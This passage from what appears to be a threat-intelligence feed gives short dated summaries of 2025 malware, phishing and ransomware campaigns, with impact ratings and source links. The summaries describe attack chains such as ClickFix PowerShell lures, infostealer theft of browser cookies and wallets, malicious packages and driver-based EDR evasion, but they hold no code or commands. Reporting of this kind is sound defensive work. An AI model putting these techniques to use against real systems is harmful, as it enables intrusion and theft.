Nextron Systems researchers have observed activity by the Nitrogen ransomware group, first detected in September 2024 and expanding from North America to Africa and Europe. This group gains initial access primarily through malvertising campaigns, tricking users searching for legitimate software like WinSCP into downloading trojanized installers from compromised WordPress sites. These installers utilize DLL sideloading ("NitrogenLoader") to execute malicious code, ultimately deploying Cobalt Strike beacons. Nitrogen actors use the compromised host as a pivot point, leveraging Cobalt Strike for lateral movement and post-compromise actions while attempting to cover tracks by clearing Windows event logs.
Source: https://www.nextron-systems.com/2025/04/29/nitrogen-dropping-cobalt-strike-a-combination-of-chemical-elements/
2025-05-15
SPID_Phishing_Campaign
LOW
Intel Source:
CERT-AGID
Intel Name:
SPID_Phishing_Campaign
Date of Scan:
2025-05-15
Impact:
LOW
Summary:
CERT-AGID has identified a phishing campaign targeting SPID users by exploiting the AgID name and logo through a recently registered fake domain. The phishing emails, with the subject line “Imminent SPID suspension: mandatory action”, urge recipients to click an Update Documentation button that redirects them to a malicious site designed to steal SPID credentials, copies of identity documents and recognition videos.
Source: https://cert-agid.gov.it/news/campagna-di-phishing-spid-tramite-falso-dominio-agid/
2025-05-15
Malware_Payload_via_Steganography
LOW
Intel Source:
ISC.SANS
Intel Name:
Malware_Payload_via_Steganography
Date of Scan:
2025-05-15
Impact:
LOW
Summary:
ISC.SANS researchers have detailed an instance in April 2025 where malware employed steganography to deliver a secondary payload. An initial .NET executable, identified as belonging to the XWorm family, utilized obfuscated strings and reflective code loading techniques. This initial malware downloaded a PNG image file from a public image hosting service. It then extracted a hidden executable payload embedded within the red pixel channel data of the image's top row. This secondary payload was subsequently loaded reflectively into memory for execution.
Source: https://isc.sans.edu/diary/Example%20of%20a%20Payload%20Delivered%20Through%20Steganography/31892
2025-05-15
Atomic_Stealer_Distributed_as_a_Crack_Program
LOW
Intel Source:
ASEC
Intel Name:
Atomic_Stealer_Distributed_as_a_Crack_Program
Date of Scan:
2025-05-15
Impact:
LOW
Summary:
ASEC researchers have identified a malware campaign in which a macOS information stealer dubbed Atomic Stealer (AMOS) is being distributed as cracked software such as Evernote. When users visit the malicious sites, their device type is checked: macOS users are redirected to the AMOS download page, while Windows users are directed to LummaC2 malware. The AMOS stealer employs AppleScript and system commands to steal browser data, keychain passwords, cryptocurrency wallets and other sensitive files. Additionally, the malware checks for virtual machine environments before compressing the collected data and secretly sending it to the attacker's server via HTTP POST requests.
Source: https://asec.ahnlab.com/ko/87730/
2025-05-15
Pentagon_Stealer
LOW
Intel Source:
Any.Run
Intel Name:
Pentagon_Stealer
Date of Scan:
2025-05-15
Impact:
LOW
Summary:
ANY.RUN researchers have detailed the emergence and evolution of Pentagon Stealer, an information-stealing malware observed since early March 2024, targeting cryptocurrency assets and user credentials. Initially identified in Golang and Python variants, the malware steals browser data (credentials, cookies), crypto wallet information (Atomic, Exodus), Discord/Telegram tokens, and specific files, communicating stolen data via HTTP POST requests to command and control (C2) servers. Key techniques include launching browsers in debug mode to bypass DPAPI and steal cookies directly, and replacing wallet application files (app.asar) with modified versions to capture mnemonics and passwords. The Python version employs multi-stage, AES-encrypted delivery, while the Golang version appeared later in attack chains involving NSIS installers.
Source: https://any.run/cybersecurity-blog/pentagon-stealer-malware-analysis/
2025-05-15
APT36_Spoofs_Indias_Defence_Portal
HIGH
Intel Source:
Hunt.IO
Intel Name:
APT36_Spoofs_Indias_Defence_Portal
Date of Scan:
2025-05-15
Impact:
HIGH
Summary:
Hunt.io researchers have identified an attack campaign employing APT36-style ClickFix techniques, observed in March 2025, spoofing India's Ministry of Defence to deliver cross-platform malware. The operation involved cloning the Ministry's press release portal, using attacker-controlled domains mimicking official subdomains, and directing visitors based on their operating system (Windows or Linux) to specific pages designed to facilitate malware execution via clipboard hijacking. Windows users were served an HTA payload via mshta.exe after a spoofed "For Official Use Only" warning, while Linux users were prompted to execute a shell script downloaded from a likely compromised .in domain following a fake CAPTCHA lure.
Source: https://hunt.io/blog/apt36-clickfix-campaign-indian-ministry-of-defence
2025-05-15
Unveiling_LUMMAC_V2
MEDIUM
Intel Source:
Google Security Operations
Intel Name:
Unveiling_LUMMAC_V2
Date of Scan:
2025-05-15
Impact:
MEDIUM
Summary:
Google Security Operations has detailed the LUMMAC.V2 (aka Lumma, Lummastealer) infostealer, a C++ rework of the original LUMMAC credential stealer featuring a binary morpher. This malware, often distributed via malicious search results leading to fake CAPTCHA pages (the "ClickFix" technique), tricks users into executing PowerShell commands via the Run dialog. The initial PowerShell loader fetches subsequent stages, which Mandiant has observed employing varied execution methods including DLL search order hijacking, process hollowing (targeting BitlockerToGo.exe), and obfuscated AutoIt-based droppers performing anti-analysis checks. LUMMAC.V2 establishes persistence via registry Run keys and targets a wide array of sensitive data including browser credentials, cryptocurrency wallets, password managers, email clients, system details, and screenshots, exfiltrating the stolen information as a ZIP archive over HTTP to Cloudflare-fronted command-and-control servers.
Source: https://www.googlecloudcommunity.com/gc/Community-Blog/Finding-Malware-Unveiling-LUMMAC-V2-with-Google-Security/ba-p/899110
2025-05-14
Horabot_Malware_Campaign
MEDIUM
Intel Source:
Fortinet
Intel Name:
Horabot_Malware_Campaign
Date of Scan:
2025-05-14
Impact:
MEDIUM
Summary:
Researchers from Fortinet have uncovered a malware campaign named Horabot targeting Spanish-speaking users across Latin America. The threat actor leverages phishing emails masquerading as legitimate invoices, embedding malicious HTML attachments that initiate a multi-stage infection chain using VBScript, AutoIt and PowerShell. The malware performs environmental checks to evade antivirus and virtual machines before establishing persistence. Once established, it collects system information, extracts Outlook contacts and steals browser credentials. It also leverages Outlook COM automation to spread laterally by sending phishing emails from compromised accounts, enabling data exfiltration and the deployment of additional banking trojans.
Source: https://www.fortinet.com/blog/threat-research/horabot-unleashed-a-stealthy-phishing-threat
2025-05-14
Operation_ToyBox_Story
HIGH
Intel Source:
Genians Security Center
Intel Name:
Operation_ToyBox_Story
Date of Scan:
2025-05-14
Impact:
HIGH
Summary:
Genians Security Center (GSC) detailed "Operation: ToyBox Story," a March 2025 spear-phishing campaign by the North Korean state-sponsored group APT37 targeting activists focused on North Korea. Using lures disguised as South Korean national security think tank invitations or information on North Korean troops in Russia, the campaign delivered malicious LNK files via Dropbox links within emails. Execution of the LNK file triggers a multi-stage infection chain involving hidden PowerShell commands, shellcode injection, and the deployment of the RokRAT backdoor, which harvests system information and screenshots for exfiltration. APT37 leverages legitimate cloud platforms like Dropbox, pCloud, and Yandex as command-and-control (C2) infrastructure, demonstrating a "Living off Trusted Sites" approach to evade detection. This continued reliance on cloud services and fileless techniques for payload delivery underscores APT37's persistent espionage objectives and presents a significant challenge for signature-based defenses, necessitating robust endpoint detection and response (EDR) capabilities and anomaly hunting to identify and mitigate the threat.
Source: https://www.genians.co.kr/en/blog/threat_intelligence/toybox-story
2025-05-14
Malicious_PyPI_Package_Targets_Discord_Developers
LOW
Intel Source:
Socket
Intel Name:
Malicious_PyPI_Package_Targets_Discord_Developers
Date of Scan:
2025-05-14
Impact:
LOW
Summary:
The Socket Research Team has discovered a malicious Python package called discordpydebug targeting Discord developers. The package masqueraded as a benign tool for logging application errors but actually contained a hidden Remote Access Trojan (RAT). Once installed, it connects to an attacker-controlled server, enabling the attackers to run commands, read and write files, and exfiltrate sensitive data such as tokens and credentials from compromised developer systems. The package was downloaded over 11,000 times before it was taken down.
Source: https://socket.dev/blog/malicious-pypi-package-targets-discord-developers-with-RAT
2025-05-13
Marbled_Dust
HIGH
Intel Source:
Microsoft
Intel Name:
Marbled_Dust
Date of Scan:
2025-05-13
Impact:
HIGH
Summary:
Microsoft Threat Intelligence reports that since April 2024, the Türkiye-affiliated espionage actor Marbled Dust has exploited a zero-day directory traversal vulnerability (CVE-2025-27920) in the Output Messenger chat application. The actor targets entities associated with the Kurdish military operating in Iraq, consistent with Marbled Dust's previously observed regional targeting priorities aimed at furthering Turkish government interests. After gaining authenticated access to the Output Messenger Server Manager, potentially via intercepted credentials from DNS hijacking or typo-squatting, Marbled Dust exploits the vulnerability to deploy VBScripts and a GoLang backdoor, enabling command-and-control communication and data exfiltration. This campaign signifies an increase in Marbled Dust's technical sophistication through the use of a zero-day exploit, posing a substantial espionage risk, as compromise grants attackers broad access to sensitive communications and user data within the targeted organization.
Source: https://www.microsoft.com/en-us/security/blog/2025/05/12/marbled-dust-leverages-zero-day-in-output-messenger-for-regional-espionage/
2025-05-13
WaterPlum_Using_OtterCookie_Malware_New_Features
MEDIUM
Intel Source:
NTT Security
Intel Name:
WaterPlum_Using_OtterCookie_Malware_New_Features
Date of Scan:
2025-05-13
Impact:
MEDIUM
Summary:
NTT Security researchers have observed the continued evolution of OtterCookie malware, utilized by the North Korea-linked threat actor WaterPlum (also known as Famous Chollima or PurpleBravo). OtterCookie, first identified in September 2024, targets financial institutions, cryptocurrency operators, and FinTech companies worldwide. The latest versions, v3 (observed February 2025) and v4 (observed April 2025), introduce enhanced stealer capabilities. Version 3 added an upload module for exfiltrating documents, images, and cryptocurrency-related files from non-Windows environments. Version 4 further expands functionality with two new stealer modules: one decrypts and steals Google Chrome credentials using DPAPI, while another exfiltrates MetaMask, Chrome, Brave browser credentials, and macOS credentials without decryption.
Source: https://jp.security.ntt/tech_blog/en-waterplum-ottercookie
2025-05-13
Cursor_IDE_Hijacked_via_Malicious_NPM
LOW
Intel Source:
Socket
Intel Name:
Cursor_IDE_Hijacked_via_Malicious_NPM
Date of Scan:
2025-05-13
Impact:
LOW
Summary:
Socket researchers have reported the discovery of three malicious npm packages (sw-cur, sw-cur1, aiide-cur) targeting macOS developers using the popular Cursor AI code editor. Published by threat actors using the aliases gtr2018 and aiide, these packages masqueraded as tools offering a cheap Cursor API, luring developers seeking cost savings. Upon execution, the malware steals Cursor credentials, fetches an AES-encrypted secondary payload from actor-controlled infrastructure, decrypts it, and overwrites the editor's core main.js file, establishing persistent backdoor access within the trusted IDE environment; one variant also disabled auto-updates.
Source: https://socket.dev/blog/malicious-npm-packages-hijack-cursor-editor-on-macos?utm_medium=feed
2025-05-13
PupkinStealer
LOW
Intel Name:
PupkinStealer
Date of Scan:
2025-05-13
Impact:
LOW
Summary:
Cyfirma researchers have discovered a new infostealer malware called PupkinStealer that first emerged in April 2025 and is attributed to an actor of Russian origin named Ardent. The malware is written in .NET and designed to steal sensitive information from Windows systems. It targets saved passwords from browsers such as Chrome, Edge and Opera, collects desktop files, steals session data from Telegram and Discord, and takes screenshots. Once collected, the data is stored in a temporary folder, zipped into a file named after the victim’s username and sent to the attacker using the Telegram Bot API.
Source: https://www.cyfirma.com/research/pupkinstealer-a-net-based-info-stealer/
2025-05-12
Chinese_Group_Exploiting_SAP_Vulnerability
MEDIUM
Intel Source:
Forescout
Intel Name:
Chinese_Group_Exploiting_SAP_Vulnerability
Date of Scan:
2025-05-12
Impact:
MEDIUM
Summary:
Researchers at Forescout have observed that CVE-2025-31324, a critical deserialization vulnerability in SAP NetWeaver Visual Composer 7.x, is being actively exploited in the wild by a Chinese threat actor tracked as Chaya_004. Exploitation, observed since at least April 29, involves POST requests to the /developmentserver/metadatauploader endpoint to upload web shells, facilitating remote code execution and potential full system takeover. The threat actor's infrastructure includes servers, many hosted on Chinese cloud providers, hosting Supershell backdoors and various Chinese-origin penetration testing tools.
Source: https://www.forescout.com/blog/threat-analysis-sap-vulnerability-exploited-in-the-wild-by-chinese-threat-actor/
2025-05-12
Lumma_Infostealer_GitHub_Campaign
LOW
Intel Source:
Picus Security
Intel Name:
Lumma_Infostealer_GitHub_Campaign
Date of Scan:
2025-05-12
Impact:
LOW
Summary:
Lumma Stealer, an information-stealing malware offered as a Malware-as-a-Service (MaaS) since August 2022, has seen a significant surge in use throughout 2024-2025, with Picus Security reporting a 369% increase in infections in late 2024. Financially motivated cybercriminals, including affiliates like the "Stargazer Goblin" group, leverage Lumma Stealer to harvest credentials, banking information, and cryptocurrency wallets. Operators primarily abuse trusted platforms like GitHub for initial access, using spearphishing links in fake issue comments or bogus security team notifications to distribute trojanized installers, often disguised as fixes or legitimate tools. Other tactics include malvertising campaigns leading to fake CAPTCHA pages that trick users into executing malicious PowerShell commands. Lumma employs numerous defense evasion techniques such as "Living off the Land" (using legitimate tools like mshta.exe, PowerShell, WMI), payload encryption, sandbox detection, and process hollowing. Stolen data is typically exfiltrated via HTTP/HTTPS to attacker C2 servers.
Source: https://www.picussecurity.com/resource/blog/lumma-infostealer-continues-its-github-social-engineering-campaign
2025-05-12
BPFDoor_Linux_Malware_Activity
MEDIUM
Intel Source:
ASEC
Intel Name:
BPFDoor_Linux_Malware_Activity
Date of Scan:
2025-05-12
Impact:
MEDIUM
Summary:
Researchers at AhnLab have observed the continuous exploitation of the Linux-based backdoor malware BPFDoor in recent hacking attacks, as detailed in a new alert and a related hash notification from KISA. Initially described in an October 2024 ASEC blog article, BPFDoor remains a continuous threat due to its open-source nature, which allows for the ongoing distribution of multiple modified strains.
Source: https://asec.ahnlab.com/en/87863/
2025-05-11
Eye_Pyramid_C2
MEDIUM
Intel Source:
Intrinsec
Intel Name:
Eye_Pyramid_C2
Date of Scan:
2025-05-11
Impact:
MEDIUM
Summary:
Intrinsec researchers discovered that several major ransomware groups, such as RansomHub, Rhysida, Vice Society and BlackCat, are leveraging the same C2 infrastructure based on the open-source Eye Pyramid framework. The investigation began by analyzing RansomHub’s Python-based backdoor and uncovered a network of connected servers, some hosted on bulletproof services, linked through a common JSON error message from the Eye Pyramid tool. These threat actors leverage Eye Pyramid for post-compromise activities, including EDR evasion and the in-memory deployment of tools like Cobalt Strike and Sliver, which eventually leads to ransomware attacks.
Source: https://www.intrinsec.com/ip-cluster-linking-ransomware-activity-and-eye-pyramid-c2/?cn-reloaded=1
2025-05-11
Hunting_Malicious_Desktop_Files
MEDIUM
Intel Source:
Google Cloud
Intel Name:
Hunting_Malicious_Desktop_Files
Date of Scan:
2025-05-11
Impact:
MEDIUM
Summary:
Researchers from Google have observed an evolution in attacks where threat actors infect Linux systems using malicious [.]desktop files. The malicious files are often disguised as shortcuts to documents such as PDFs but actually contain hidden code that downloads and executes malware such as cryptominers. When a user opens the legitimate-looking file, it secretly executes malicious code in the background. These attacks take advantage of standard Linux desktop features found in environments like XFCE, GNOME, and KDE. This tactic particularly affects users in India and Australia.
Source: https://www.googlecloudcommunity.com/gc/Community-Blog/Actionable-threat-hunting-with-Google-Threat-Intelligence-I/ba-p/895333
2025-05-11
The_Growing_Threat_of_Vishing
LOW
Intel Source:
Trellix
Intel Name:
The_Growing_Threat_of_Vishing
Date of Scan:
2025-05-11
Impact:
LOW
Summary:
Researchers from Trellix have observed a rise in advanced voice phishing campaigns in which cybercriminals leverage email attachments to trick people into calling fake support numbers. The cybercriminals impersonate well-known organisations like PayPal and send emails that contain minimal text but include attachments such as PDFs, images, and MP4 and WebP files to create urgency. When victims call the fake support numbers, the attackers use social engineering tactics to manipulate them into sharing sensitive information such as login credentials and financial details, which often leads to unauthorized transactions.
Source: https://www.trellix.com/blogs/research/the-growing-threat-of-vishing-how-cybercriminals-are-using-multimedia-to-target-you/
2025-05-11
Intrusion_of_Interlock_Ransomware
MEDIUM
Intel Source:
GuidePoint
Intel Name:
Intrusion_of_Interlock_Ransomware
Date of Scan:
2025-05-11
Impact:
MEDIUM
Summary:
Researchers at GuidePoint have uncovered a cyber-attack by Interlock ransomware in which attackers trick users into downloading SocGholish malware through fake human verification pop-ups on compromised legitimate websites. Once initial access is gained, Interlock operators install NetSupport RAT to maintain persistence, perform network scanning, and escalate their privileges using techniques such as hijacking Microsoft 365 sessions and stealing credentials from LastPass. Afterward, the attackers use a renamed version of the AzCopy tool to transfer sensitive data to attacker-controlled cloud storage. Finally, they deploy the Interlock ransomware, leveraging tools like PsExec or even Group Policy Objects to spread across systems, locking users out and encrypting data.
Source: https://www.guidepointsecurity.com/blog/interesting-interlock-intrusion-how-interlock-achieves-encryption/
2025-05-11
Multilayered_Email_Attack
LOW
Intel Source:
Fortinet
Intel Name:
Multilayered_Email_Attack
Date of Scan:
2025-05-11
Impact:
LOW
Summary:
FortiGuard researchers have uncovered a multilayered email campaign targeting organizations in Spain, Italy, and Portugal. The attackers are distributing a Java-based RAT called Ratty by sending deceptive PDF invoice attachments via a legitimate Spanish email service provider. When victims open the PDF and click the link inside, they are taken through various steps, including file-sharing services like Dropbox and MediaFire, a fake CAPTCHA page and a hidden server exposed through Ngrok, to deliver the malware. The campaign uses geo-blocking as an evasion technique, so only users in specific countries (Italy) receive the actual malware while others just see a malicious document. Once the malware is installed on Windows, Linux, or macOS, it gives attackers full control, allowing them to execute commands, steal files, record keystrokes and even turn on webcams or microphones.
Source: https://www.fortinet.com/blog/threat-research/multilayered-email-attack-how-a-pdf-invoice-and-geofencing-led-to-rat-malware
2025-05-10
CoGUI_Phish_Kit_Targeting_Japan
MEDIUM
Intel Source:
Proofpoint
Intel Name:
CoGUI_Phish_Kit_Targeting_Japan
Date of Scan:
2025-05-10
Impact:
MEDIUM
Summary:
Researchers at Proofpoint have observed a high-volume phishing campaign leveraging a kit named CoGUI, primarily targeting Japanese organizations since at least October 2024, with activity peaking in January 2025 with over 172 million messages. The CoGUI phishing kit, likely operated by multiple Chinese-speaking threat actors, impersonates well-known consumer and finance brands such as Amazon, PayPay, and Rakuten, with the objective of stealing usernames, passwords, and payment data. It employs advanced evasion techniques including geofencing, header fencing, and browser fingerprinting to selectively target users, primarily in Japan, though less frequent campaigns have targeted Australia, New Zealand, Canada, and the United States. Although similar in some aspects to the Darcula phishing kit, CoGUI is distinct.
Source: https://www.proofpoint.com/us/blog/threat-insight/cogui-phish-kit-targets-japan-millions-messages
2025-05-10
COLDRIVER_Using_LOSTKEYS_Malware
MEDIUM
Intel Source:
Google Cloud
Intel Name:
COLDRIVER_Using_LOSTKEYS_Malware
Date of Scan:
2025-05-10
Impact:
MEDIUM
Summary:
Researchers from Google have discovered a new malware called LOSTKEYS linked to the Russian threat actor COLDRIVER, aka UNC4057 and Star Blizzard. Initially, the group focused on stealing credentials through phishing emails, but it has now incorporated malware to exfiltrate documents and system information from Western governments, NGOs, former diplomats, journalists and individuals linked to Ukraine. The attackers lure victims to a fraudulent website displaying a fake CAPTCHA, which instructs them to copy and execute a PowerShell command that initiates a multi-stage process to install the malware. The final payload executes a VBS script that searches for files with specific extensions in specific directories, stealing them along with system information. The primary goal of COLDRIVER’s operations is to collect intelligence in support of Russia’s strategic interests.
Source: https://cloud.google.com/blog/topics/threat-intelligence/coldriver-steal-documents-western-targets-ngos/
2025-05-10
Nitrogen_Ransomware
MEDIUM
Intel Source:
Any.Run
Intel Name:
Nitrogen_Ransomware
Date of Scan:
2025-05-10
Impact:
MEDIUM
Summary:
Researchers from Any.Run have uncovered a new ransomware group named Nitrogen Ransomware, which has been active since at least September 2024, primarily targeting the financial, construction, manufacturing, and tech sectors in the United States, Canada and the United Kingdom. The group’s modus operandi involves encrypting critical data and demanding ransoms. It leverages various techniques such as creating a unique mutex before encryption, exploiting a legitimate but vulnerable driver to disable antivirus and endpoint detection, and modifying system settings with bcdedit.exe to disable Windows Safe Boot and system recovery. Researchers also suspect a possible link between Nitrogen and the LukaLocker ransomware group based on similar file extensions and ransom notes.
Source: https://any.run/cybersecurity-blog/nitrogen-ransomware-report/
2025-05-10
RedisRaider_Campaign
MEDIUM
Intel Source:
Datadog Security Labs
Intel Name:
RedisRaider_Campaign
Date of Scan:
2025-05-10
Impact:
MEDIUM
Summary:
Researchers from Datadog have identified an advanced Linux cryptojacking campaign that actively exploits publicly accessible Redis servers. The attackers deploy a Go-based worm that scans the internet for vulnerable Redis servers. Once a target is found, they abuse legitimate Redis functionality to install scheduled tasks that download and run a customized Monero (XMR) cryptocurrency miner. They also run a web-based Monero miner hosted on their own servers, indicating multiple methods of monetization. The malware employs significant obfuscation through tools like Garble and custom payload packing, and includes anti-forensics techniques to avoid detection. If the attack is successful, it can slow down affected systems, drain resources and potentially open the door to more serious breaches.
Source: https://securitylabs.datadoghq.com/articles/redisraider-weaponizing-misconfigured-redis/
2025-05-09
Play_Ransomware_Leveraged_Windows_Zero_day
MEDIUM
Intel Source:
Symantec
Intel Name:
Play_Ransomware_Leveraged_Windows_Zero_day
Date of Scan:
2025-05-09
Impact:
MEDIUM
Summary:
Symantec researchers uncovered that attackers linked to the Play ransomware group, also known as Balloonfly, leveraged a zero-day Windows privilege escalation vulnerability (CVE-2025-29824) during an attempted attack against a U.S. organisation prior to the vulnerability's disclosure and patching on April 8, 2025. Although no ransomware payload was deployed, the attackers used a custom information stealer called Grixba along with several hacking tools. They took advantage of a bug in the Common Log File System (CLFS) kernel driver by manipulating system memory, allowing them to steal sensitive data, create an admin account, and delete artifacts. Microsoft reported that only a few organizations in the U.S., Venezuela, Spain, and Saudi Arabia were targeted, potentially by multiple actors including Storm-2460, before the patch was released.
Source: https://www.security.com/threat-intelligence/play-ransomware-zero-day
2025-05-09
Evolving_Malware_via_Dynamic_Modules
LOW
Intel Source:
ISC.SANS
Intel Name:
Evolving_Malware_via_Dynamic_Modules
Date of Scan:
2025-05-09
Impact:
LOW
Summary:
Researchers at ISC.SANS have noticed a growing trend in malware development in which attackers use "modular" tactics to improve the functionality of their malware only when necessary. This strategy, like on-demand library loading in software development, enables malware to grow its capabilities based on the environment it infects. For example, a malware sample classified as a Discord RAT is programmed to scan a victim's PC for specified targets, such as SAP-related files, before dynamically fetching additional modules from a Command and Control server to expand its reach. This strategy not only minimizes the initial size of the malware, but it also makes it appear less suspicious, allowing it to avoid detection.
Source: https://isc.sans.edu/diary/rss/31928
2025-04-29
Tax_Return_Scam_and_Phishing_Alert
MEDIUM
Intel Source:
Palo Alto
Intel Name:
Tax_Return_Scam_and_Phishing_Alert
Date of Scan:
2025-04-29
Impact:
MEDIUM
Summary:
In the past four months, numerous newly registered domains with tax return themes have emerged. Unit42 researchers have identified several phishing and scam campaigns exploiting the U.S. tax return season.
Source: https://github.com/PaloAltoNetworks/Unit42-timely-threat-intel/blob/main/2025-04-15-IOCs-for-tax-return-related-phishing-and-scams.txt
2025-04-29
Outlaw_A_Crypto_Mining_Botnet
MEDIUM
Intel Source:
Securelist
Intel Name:
Outlaw_A_Crypto_Mining_Botnet
Date of Scan:
2025-04-29
Impact:
MEDIUM
Summary:
Researchers at Securelist have uncovered a cyberattack by a group called Outlaw, also known as Dota. It is a Perl-based crypto-mining botnet targeting Linux systems primarily for cryptojacking. The botnet targeted systems in the U.S., Brazil, Germany, and several Asian countries by taking advantage of weak SSH credentials on misconfigured accounts like suporte to gain unauthorized access. After gaining access, the attackers used Linux tools like wget and curl to download malicious scripts and compressed files. The malware then removed other cryptominers and installed its customized XMRig to use the system’s resources to mine Monero cryptocurrency. The botnet maintained persistence by modifying SSH keys, disguising itself as legitimate processes and leveraging an IRC-based backdoor for remote access.
Source: https://securelist.com/outlaw-botnet/116444/
2025-04-28
Track_APT34_Like_Infra_Early
MEDIUM
Intel Source:
Hunt.IO
Intel Name:
Track_APT34_Like_Infra_Early
Date of Scan:
2025-04-28
Impact:
MEDIUM
Summary:
Hunt.io researchers have identified command-and-control infrastructure exhibiting similarities to APT34 (OilRig) TTPs being staged between November 2024 and April 2025, though currently dormant from a payload perspective. The operators registered domains impersonating an Iraqi academic institute and several fictitious UK-based technology firms (using .eu TLDs), hosted primarily on M247 infrastructure.
Source: https://hunt.io/blog/track-apt34-like-infrastructure-before-it-strikes
2025-04-28
KeyPlug_Malware_Exposure
LOW
Intel Source:
Hunt.IO
Intel Name:
KeyPlug_Malware_Exposure
Date of Scan:
2025-04-28
Impact:
LOW
Summary:
Researchers from Hunt.IO have discovered that a briefly exposed server linked to KeyPlug malware infrastructure likely associated with RedGolf/APT41 provided a rare glimpse into active adversary operations. The server, which stayed live for less than 24 hours, included Fortinet firewall and VPN exploit scripts, a PHP-based webshell capable of AES and XOR-decrypted payload execution, and reconnaissance tools targeting authentication, development, and identity portals of a big Japanese corporation.
Source: https://hunt.io/blog/keyplug-server-exposes-fortinet-exploits-webshells
2025-04-28
Targeted_Phishing_Using_PHP_Kits
LOW
Intel Source:
Hunt.IO
Intel Name:
Targeted_Phishing_Using_PHP_Kits
Date of Scan:
2025-04-28
Impact:
LOW
Summary:
Hunt.io researchers have discovered an active server-side phishing campaign targeting employee and member portals via a PHP-based phishing kit. Unlike previous approaches, which relied on client-side redirects to validate stolen credentials, the most recent approach performs similar checks server-side, apparently to hinder analysis and limit visibility.
Source: https://hunt.io/blog/server-side-phishing-evasion-employee-portals
2025-04-28
XLoader_Infostealer_Exploits_Past_Vulnerability
LOW
Intel Source:
ASEC
Intel Name:
XLoader_Infostealer_Exploits_Past_Vulnerability
Date of Scan:
2025-04-28
Impact:
LOW
Summary:
ASEC researchers have uncovered a phishing campaign that distributes the XLoader info-stealer malware through emails disguised as purchase or order confirmations. These emails trick recipients into opening a DOCX attachment that secretly contains a malicious RTF file exploiting a known vulnerability (CVE-2017-11882) in Microsoft's Equation Editor. When the file is opened, it runs a hidden script that launches the XLoader malware, using a tool called HorusProtector to inject the malicious payload into a legitimate process.
Source: https://asec.ahnlab.com/ko/87689/
2025-04-28
Hannibal_Stealer
LOW
Intel Source:
Cyfirma
Intel Name:
Hannibal_Stealer
Date of Scan:
2025-04-28
Impact:
LOW
Summary:
Cyfirma researchers have identified a data-stealing malware called Hannibal Stealer. This malware first emerged in February 2025 and is an enhanced version of the Sharp and TX stealers. Hannibal Stealer targets web browsers like Chrome and Firefox to extract saved data, cryptocurrency wallets such as MetaMask, Exodus, and Monero, and FTP clients like FileZilla and Total Commander. It can also hijack clipboard data to steal cryptocurrency transactions, capture VPN credentials, steal Telegram and Discord session data, and extract screenshots and specific files from compromised machines.
Source: https://www.cyfirma.com/research/hannibal-stealer-a-rebranded-threat-born-from-sharp-and-tx-lineage/
2025-04-28
CrazyHunter_Targets_Taiwanese_Critical_Sectors
MEDIUM
Intel Source:
Trend Micro
Intel Name:
CrazyHunter_Targets_Taiwanese_Critical_Sectors
Date of Scan:
2025-04-28
Impact:
MEDIUM
Summary:
Trend Micro researchers have discovered a ransomware campaign called CrazyHunter that is actively targeting Taiwan's significant sectors, such as healthcare, education, and industrial enterprises. The group has demonstrated advanced capabilities by using the Bring Your Own Vulnerable Driver (BYOVD) technique to bypass security controls and incorporating a diverse set of open-source tools from platforms such as GitHub, including the Prince Ransomware Builder and ZammoCide, accounting for roughly 80% of their toolkit.
Source: https://www.trendmicro.com/en_us/research/25/d/crazyhunter-campaign.html
2025-04-28
RansomHub_Tactics_via_SocGholish
MEDIUM
Intel Source:
Esentire
Intel Name:
RansomHub_Tactics_via_SocGholish
Date of Scan:
2025-04-28
Impact:
MEDIUM
Summary:
Researchers at eSentire have identified a cyberattack in early March 2025 that employed SocGholish (also known as FakeUpdates) malware to capture system information and deliver a ZIP archive with a Python-based backdoor tied to RansomHub affiliates. RansomHub, a Ransomware-as-a-Service (RaaS) group founded in 2024, targets high-profile companies and promotes its services on the RAMP (Russian Anonymous Market Place) forum.
Source: https://www.esentire.com/blog/socket-puppet-how-ransomhub-affiliates-pull-the-strings
2025-04-28
Stego_Campaign_delivers_AsyncRAT
LOW
Intel Source:
Sophos
Intel Name:
Stego_Campaign_delivers_AsyncRAT
Date of Scan:
2025-04-28
Impact:
LOW
Summary:
Sophos researchers have discovered a malware campaign in which attackers hide malicious code inside images using a technique called steganography. The attack begins with phishing emails that trick users into opening an MS Office document. When opened, it runs a hidden script that downloads a modified Windows script file, which triggers a PowerShell script that secretly downloads an image file containing malicious code. The script includes DLL files that use the process hollowing technique to load the tool known as AsyncRAT. This tool gives attackers full access to the victim's system, allowing them to spy on users, log keystrokes, control the desktop remotely and even deploy ransomware.
Source: https://medium.com/@andrew.petrus/stego-campaign-delivers-asyncrat-446cba118c6b
2025-04-28
Power_Parasites_Scam_Campaign
LOW
Intel Source:
Silent Push
Intel Name:
Power_Parasites_Scam_Campaign
Date of Scan:
2025-04-28
Impact:
LOW
Summary:
Silent Push researchers have discovered an ongoing scam campaign known as "Power Parasites," which uses false websites, social media groups, and Telegram channels to carry out bogus job and investment scams. The campaign, which primarily targets individuals in Asian countries such as Bangladesh, Nepal, and India, impersonates large worldwide businesses, particularly those in the energy sector.
Source: https://www.silentpush.com/blog/power-parasites/?utm_source=rss&utm_medium=rss&utm_campaign=power-parasites
2025-04-27
How_Tycoon2FA_Phishing_Chooses_Its_Victims
MEDIUM
Intel Source:
Any.Run
Intel Name:
How_Tycoon2FA_Phishing_Chooses_Its_Victims
Date of Scan:
2025-04-27
Impact:
MEDIUM
Summary:
ANY.RUN researchers have analyzed a sophisticated phishing technique employed by the Tycoon2FA threat actor, utilizing geolocation and system fingerprinting to selectively target users in Argentina, Brazil, and the Middle East (UTC-3, UTC+2 to +4 timezones). Observed in April 2025, the attack begins when a user visits a newly registered domain hosted on AS-CHOOPA infrastructure. An initial benign redirect is triggered, but just before it occurs, a hidden image tag executes a fingerprinting script via its onerror event. This script collects system details (screen resolution, user agent, timezone, GPU info) and POSTs them to the server. Only if the fingerprint and geolocation match the attacker's target criteria does the server respond with a redirect to the actual Tycoon2FA phishing page; otherwise, users are sent to legitimate sites like Tesla or Emirates.
Source: https://x.com/anyrun_app/status/1914999622881235340
2025-04-27
LNK_Malware_Targets_Korean_Users
LOW
Intel Source:
ASEC
Intel Name:
LNK_Malware_Targets_Korean_Users
Date of Scan:
2025-04-27
Impact:
LOW
Summary:
